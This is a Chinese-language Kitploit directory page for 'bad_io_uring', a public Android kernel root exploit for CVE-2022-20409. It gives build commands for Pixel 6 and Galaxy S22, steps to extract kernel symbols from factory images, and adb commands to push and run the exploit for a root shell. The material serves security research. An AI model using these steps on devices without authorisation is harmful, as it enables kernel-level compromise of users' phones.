Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
bad_io_uring — 针对 CVE-2022-20409 的 Android 内核漏洞利用 | Kitploit
工具/GitHubGitHub/markakd/bad_io_uring
Android安全权限提升漏洞分析漏洞利用渗透测试移动安全二进制利用
GitHubmarkakd/bad_io_uring

bad_io_uring

针对 CVE-2022-20409 的 Android 内核漏洞利用

查看仓库
2133021年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Bad IO_uring

https://www.blackhat.com/us-23/briefings/schedule/index.html#bad-io_uring-a-new-era-of-rooting-for-android-32243

构建漏洞利用程序

确保已安装 Android NDK。对于 Pixel 6,

root@kitploit:~
make pixel

对于三星 S22,

root@kitploit:~
make s22

如何使用漏洞利用程序

该漏洞利用程序旨在支持不同版本的内核。为了将漏洞利用移植到不同的内核,你需要提取目标内核的符号文件。

可以从手机的出厂镜像中提取内核。对于 Pixel 设备,请在此下载出厂镜像。

下载镜像后,解压镜像以获得 boot.img 文件。可以使用 tools/unpack_bootimg.py 提取 boot.img。

root@kitploit:~
python3 tools/unpack_bootimg.py --boot_img boot.img --out out

你会看到内核位于 out/kernel。

现在,有了内核镜像,我们可以使用 vmlinux-to-elf 从中提取内核符号。

root@kitploit:~
./tools/vmlinux-to-elf/kallsyms-finder out/kernel > pixel.kallsyms

你必须确保提取到的符号中的 Version string 与手机的内核版本匹配。可以通过 adb 查找手机的内核版本。例如,

root@kitploit:~
sh-3.2$ adb shell
oriole:/ $ uname -a
Linux localhost 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022 aarch64

与

root@kitploit:~
[+] Version string: Linux version 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 (build-user@build-host) (Android (7284624, based on r416183b) clang version 12.0.5 (https://android.googlesource.com/toolchain/llvm-project c935d99d7cf2016289302412d708641d52d2f7ee), LLD 12.0.5 (/buildbot/src/android/llvm-toolchain/out/llvm-project/lld c935d99d7cf2016289302412d708641d52d2f7ee)) #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022

匹配

现在,你可以将漏洞利用程序和符号文件推送到手机,并使用以下命令获取 root 权限。

root@kitploit:~
make
adb push exp pixel.kallsyms /data/local/tmp
adb shell
cd /data/local/tmp
./exp pixel.kallsyms

尽情享受你的 root shell 吧 :)

下载工具